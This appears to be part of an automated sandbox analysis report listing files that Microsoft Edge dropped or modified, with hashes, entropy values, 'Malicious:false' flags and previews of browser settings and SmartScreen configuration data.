                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                  MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                  SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                  SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                  SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:customSynchronousLookupUris_0
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3581
                                                                                                                                                                  Entropy (8bit):4.459693941095613
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                  MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                  SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                  SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                  SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:topTraffic_638004170464094982
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:uriCache_
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                  Entropy (8bit):5.0160329066530585
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTjFVY4Y:YWLSGTt1o9LuLgfGBPAzkVj/T8ldy4Y
                                                                                                                                                                  MD5:3595396291C90AB4B3E0F64EBA4133B5
                                                                                                                                                                  SHA1:06185E3CCDAE1D1194C580B1292AEB2C0E0D4D57
                                                                                                                                                                  SHA-256:70B9872FF9BE9470EF44497FBEE90DF6F0636065459888E7271F637B6AD06421
                                                                                                                                                                  SHA-512:4078FB15C4CD7F5DA43D3BFEC7F0C1DD47418EC02BA460F58A7B11972745ABFE33201364838296C27B10D37E4B9FDCC6A1A72028959048B3693F329563D7F3E8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736302678555962}]}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                  Entropy (8bit):4.389669793590032
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQOn:YQ3Kq9X0dMgAEiLIMn
                                                                                                                                                                  MD5:03B6D5E81A4DC4D4E6C27BE1E932B9D9
                                                                                                                                                                  SHA1:3C5EF0615314BDB136AB57C90359F1839BDD5C93
                                                                                                                                                                  SHA-256:73B017F7C5ECD629AD41D14147D53F7D3D070C5967E1E571811A6DB39F06EACC
                                                                                                                                                                  SHA-512:0037EB23CCDBDDE93CFEB7B9A223D59D0872D4EC7F5E3CA4F7767A7301E96E1AF1175980DC4F08531D5571AFB94DF789567588DEB2D6D611C57EE4CC05376547
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":15}
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8373
                                                                                                                                                                  Entropy (8bit):5.784066969148297
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:fsNwtBCteiRUdqj/lkCW6qRAq1k8SPxVLZ7VTiQ:fsNwKdYg/2CW6q3QxVNZTiQ
                                                                                                                                                                  MD5:F8891FB010A1F7CACC68AB500DEF709F
                                                                                                                                                                  SHA1:40E8BE7D7337EAD35ED232D09F7B80AE9462EF55
                                                                                                                                                                  SHA-256:072FDD1061E72491A3EA07F0932095BC8DFCBAFAE42690EDCD54DB5D6DCF03B2
                                                                                                                                                                  SHA-512:95C746C8ED0109E9BB036DD6B09E79D7D1E5DB0226E3B5C56BA6910F1114013E76B9610CCEB61C8E7B960BF2F5D9A5FBA10BDD9A70775A30B7079DC2FF760BAE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8110
                                                                                                                                                                  Entropy (8bit):5.800596893389728
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:asNAtBCteiRUVfQTkCG6qRAq1k8SPxVLZ7VTiq:asNAKdw4QCG6q3QxVNZTiq
                                                                                                                                                                  MD5:4014F4FCF6D9408D2C5919DC1DE23A0A
                                                                                                                                                                  SHA1:2A8EB58DFF151022C49057265AFBAF504D27B1DA
                                                                                                                                                                  SHA-256:2292410242834994B23BA03EB5C7BC50E3652C9AE034EE8655D6A54F40BEE108
                                                                                                                                                                  SHA-512:2895154F175E85FB1DEFDE498906B8AC683201EB224E4AB299593CD3E3C2BB93EDDF3526AE0022E0E0A740C8F77798546F218D2B39CD1DCFB8B2C1A593E9E719
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24958
                                                                                                                                                                  Entropy (8bit):6.030761444552139
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:9MkbJrT8IeQc5w1luQ9P4t/2CwL5uTY3JU:9Mk1rT8HY1gj2FuTT
                                                                                                                                                                  MD5:28AA19E6D4548C1584B26994E71EAA1A
                                                                                                                                                                  SHA1:65DEFCF37D52CB1336CA5796A4CCD9AED7AC97CD
                                                                                                                                                                  SHA-256:09103EC3D905A587EF9CED0F07D9928C272645FAD9EDBA3366588F8B65A1C7EB
                                                                                                                                                                  SHA-512:AE721F03E768CC6D49B48068CBA3034E335DD0F4939FFB01942802BE49894ECBFD01F976C8873484783AA4F99F2702B6FE45C5AE05E9C5AB509B818DB9AC4481
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8278
                                                                                                                                                                  Entropy (8bit):5.480598478434951
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uVgXqsNk5hsGKf1BCg5ih/cIyURLl8Roto24j2lDBE2Vvl6NZjRe4WJkCcIrbtla:uxsNwhEBCdViRUvExXjEkCLMT2WQ/a
                                                                                                                                                                  MD5:1EFC9CCBFD90C24E699B6F853D4238C1
                                                                                                                                                                  SHA1:266DE0186620B900A37986F446C22D4876EB410F
                                                                                                                                                                  SHA-256:A146BD15C0749D9322DC7C9336518F272746DE3F542A9EEDB5C15CB755AF9B2E
                                                                                                                                                                  SHA-512:763EE323389B3EAEF760D06E5393CF21D33CD10E74D2E22E4C6828E8690D6853D161CB776367990B8156551C39BB84DAC3210D856A7E7459ADFA7DAE5DBC374A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sid
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):8110
                                                                                                                                                                  Entropy (8bit):5.800596893389728
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:asNAtBCteiRUVfQTkCG6qRAq1k8SPxVLZ7VTiq:asNAKdw4QCG6q3QxVNZTiq
                                                                                                                                                                  MD5:4014F4FCF6D9408D2C5919DC1DE23A0A
                                                                                                                                                                  SHA1:2A8EB58DFF151022C49057265AFBAF504D27B1DA
                                                                                                                                                                  SHA-256:2292410242834994B23BA03EB5C7BC50E3652C9AE034EE8655D6A54F40BEE108
                                                                                                                                                                  SHA-512:2895154F175E85FB1DEFDE498906B8AC683201EB224E4AB299593CD3E3C2BB93EDDF3526AE0022E0E0A740C8F77798546F218D2B39CD1DCFB8B2C1A593E9E719
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8351
                                                                                                                                                                  Entropy (8bit):5.486905765645497
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uVgXqsNk5hsGKf1BCg5ih/cIyURLl8Roto24j2lDBE2Vvl62Zj/Me4WJkCcIrbtw:uxsNwhEBCdViRUvEx2j/lkCLMT2WQ/m
                                                                                                                                                                  MD5:2A1894D29028B8B9C73D0CE0AFF69F9F
                                                                                                                                                                  SHA1:99C63D219A6446B887C239DD066B1142494899F4
                                                                                                                                                                  SHA-256:2D454D7D19D4AFAE94E80C6754E77061231817F19EBC2760CB4C0F7AB4724B22
                                                                                                                                                                  SHA-512:895D900FE7BF089AE4866B35018D48D13104A3BC556B63696B5A4EE10776800FA36DB179944E8E07935F0E847259539D3AAAEAAFBF2E9132FF62415F8CC48F9C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sid
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                  Entropy (8bit):3.8429304279392076
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxjxl9Il8uJhXa/IGpbWcLgIofqd1rc:miY5X0bF0Iop
                                                                                                                                                                  MD5:1B1498938D5CAFBE0D6495DCB4449A64
                                                                                                                                                                  SHA1:23CC2D968FD8587707BF876C6523CCC4D0103AB7
                                                                                                                                                                  SHA-256:524E3DC87B9D4A131B0AB5FD2439E676D4848C7873B7F44909CA69A71FD92332
                                                                                                                                                                  SHA-512:1A2EEABB1A2FCC13610718775AA1D483D4F06C7923BD9F472EEE12C57C65AAE645FBA86E3E7A2F889A18160B9A37AB570DA88EFBDEA353337F094899F6AD3EC0
                                                                                                                                                                  Malicious:false
